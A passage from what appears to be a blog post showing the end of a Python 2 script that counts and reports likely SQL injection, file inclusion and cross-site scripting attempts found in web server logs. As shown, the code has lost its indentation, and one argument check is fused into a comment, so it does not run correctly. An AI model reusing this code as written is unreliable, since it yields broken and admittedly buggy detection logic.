generated_report.write("Hint: XSS attempt discovery feature might be a little bit buggy.\n")
generated_report.write("\n")
generated_report.write("\n")
generated_report.write("Number of possible SQL injection attempts found: " + sqli_numbers + "\n")
generated_report.write("Number of possible local file inclusion attempts found: " + lfi_numbers + "\n")
generated_report.write("Number of possible remote file inclusion attempts found: " + rfi_numbers + "\n")
generated_report.write("Number of possible cross-site scripting attempts found: " + xss_numbers + "\n")
generated_report.write("\n")
generated_report.write("\n")
if len(sqli_found_list) != 0:
sqli_found_list_string = ""
sqli_found_list_string = "".join(str(sqli_found_list))
generated_report.write("Details for the SQL injection attempts (line, log entry)\n")
generated_report.write("------------------------------------------------\n")
generated_report.write(sqli_found_list_string)
generated_report.write("\n")
generated_report.write("\n")
generated_report.write("\n")
if len(lfi_found_list) != 0:
lfi_found_list_string = ""
lfi_found_list_string = "".join(str(lfi_found_list))
generated_report.write("Details for the local file inclusion attempts (line, log entry)\n")
generated_report.write("------------------------------------------------\n")
generated_report.write(lfi_found_list_string)
generated_report.write("\n")
generated_report.write("\n")
generated_report.write("\n")
if len(rfi_found_list) != 0:
rfi_found_list_string = ""
rfi_found_list_string = "".join(str(rfi_found_list))
generated_report.write("Details for the remote file inclusion attempts (line, log entry)\n")
generated_report.write("------------------------------------------------\n")
generated_report.write(rfi_found_list_string)
generated_report.write("\n")
generated_report.write("\n")
generated_report.write("\n")
if len(xss_found_list) != 0:
xss_found_list_string = ""
xss_found_list_string = "".join(str(xss_found_list))
generated_report.write("Details for the cross-site scripting attempts (line, log entry)\n")
generated_report.write("------------------------------------------------\n")
generated_report.write(xss_found_list_string)
generated_report.write("\n")
generated_report.write("\n")
generated_report.write("\n")
# Close the file
generated_report.close()
print "[i] Finished writing the report."
print "[i] Hint: The report file can become quite large."
print "[i] Hint: The XSS attempt discovery feature might be a little bit buggy."
print ""
print "[i] That's it, bye!"
print ""
print ""
return
# End of the log file function
# Checking if argument was provided if len(sys.argv) <=1:
print_usage()
sys.exit(1)
for arg in sys.argv:
# Checking if help was called
if arg == "--help":
print_help()
sys.exit(1)
# Checking if a log file was provided, if yes -> go!
if arg == "-file":
provided_file = sys.argv[2]
print_banner()
# Start the main analyze function
analyze_log_file(provided_file)
sys.exit(1)
### EOF ###
Subscribe to:
Posts (Atom)